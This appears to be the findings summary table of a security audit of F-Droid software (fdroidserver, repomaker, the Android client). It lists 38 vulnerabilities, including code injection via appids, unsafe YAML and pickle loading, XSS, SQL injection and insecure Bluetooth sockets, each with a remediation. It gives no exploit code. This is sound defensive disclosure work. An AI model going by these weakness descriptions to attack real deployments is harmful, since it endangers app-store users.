<div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Recommendation</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Upgrade to a version of Bleach which fixes this bug.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; 
padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Restrict URLs to HTTP(S) schemes.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" 
valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Validate the URL and disallow schemes such as <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, for example by using a whitelist.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>HTML/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The user-supplied URI should be parsed and its components validated before it is included in the response.
Alternatively, URL-encode or HTML-encode the URI.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>For mobile-based repos, use a mechanism similar to asking for a PIN before pairing two devices over Bluetooth.
For non-mobile repos, the TOFU key should not be stored permanently.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application should validate the message shown to the user and its origin. Accepting an arbitrary message or domain from another user and redirecting the user to that domain is a very insecure implementation: users should not be redirected to any domain supplied by the other user, and this parameter also needs to be validated.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Run the Bleach sanitizer over the descriptions.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Either use longer IDs, or do not derive the IDs from user input.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Check the size of images before processing them, and set ulimit and disk quotas.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Generate export files in a dedicated folder with restrictive access permissions.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Replace these calls with their defusedxml equivalents or, for <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.*</span> modules only, make sure <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">defusedxml.defuse_stdlib()</span> is called.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Only allow certain types of files to be transmitted (whitelisting) if possible.
Limit the size of files to be transmitted, and warn the user about large files.
The issue should be fixed in the parent class, and the subclasses should perform a content type check, to avoid malicious file/app installation on the victim device.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Instead of TOFU, an out-of-band key sharing mechanism can be used to exchange keys between untrusted devices, for example sharing a password-protected file containing a symmetric encryption key over the insecure RFCOMM socket.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Instead of TOFU, an out-of-band key sharing mechanism can be used to exchange keys between untrusted devices, for example sharing a password-protected file containing a symmetric encryption key over the insecure RFCOMM socket.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use prepared statements for DB queries.
Validate the strings against a whitelist before using them in an SQL query.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
If this feature is not needed, it should be removed.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
If the output file already exists, the function should return an error and let higher-level code handle it. Alternatively, the code should add a random suffix to the output file name when the specified file exists.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">File</span> class in Java allows creating subdirectories and setting specific permissions on created files. It is recommended to create the temp files within an app-specific subdirectory, for example "Fdroid" under the global tmp folder. This subfolder can be created with owner-only permissions, so that the other temporary files can then be created with restricted permissions inside this app-specific folder.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Never use unvalidated user input inside an SQL query that is then executed. The best way to make sure adversaries cannot inject unsolicited SQL syntax into your queries is to avoid using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SQLiteDatabase.rawQuery()</span> and opt for a parameterized statement instead.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The way the feature has been implemented is prone to several attacks. It is suggested not to simply open a web server that everyone can access; some form of authentication should be applied.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
A better security practice is to include an SSL certificate inside the application build and then, at runtime, check and trust only that certificate. This is known as SSL pinning.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated. SHA256 is a better algorithm to use.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">rel="noopener"</span> when using <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">target="_blank"</span>.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Check whether the MIME type matches the extension.
Use a whitelist of extensions instead of a blacklist.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Clean the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">name</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">data_list</span> contents before rendering.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Avoid using the Python <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">pickle</span> module.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Establish a list of all good paths once (during installation), store it in a file with secure permissions and use this to call the external programs.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 
4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Validate appids.</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Only allow certain types of files to be transmitted (whitelisting) if possible.
Limit the size of files to be transmitted, and warn the user about large files.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Provide a key revocation list check. Alternatively, list the root CA keys in a separate file which can be updated independently.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
If the data being protected is sensitive, stronger encryption methods should be used.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
A documented manual review of external links before accepting an MR/PR/update/patch should be in place, and a warning should be displayed to users when they click on external links.
</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The regular expression pattern should be strengthened to disallow special characters such as semicolons, pipes and quotes, to avoid OS command injection attacks.
</div></td></tr></tbody></table></div>
</div>
<a name="dataSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.8</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Charts</div></td></tr></table></div>
<a name="threatlevelpie"></a><div style="margin-bottom: 1.3cm;">
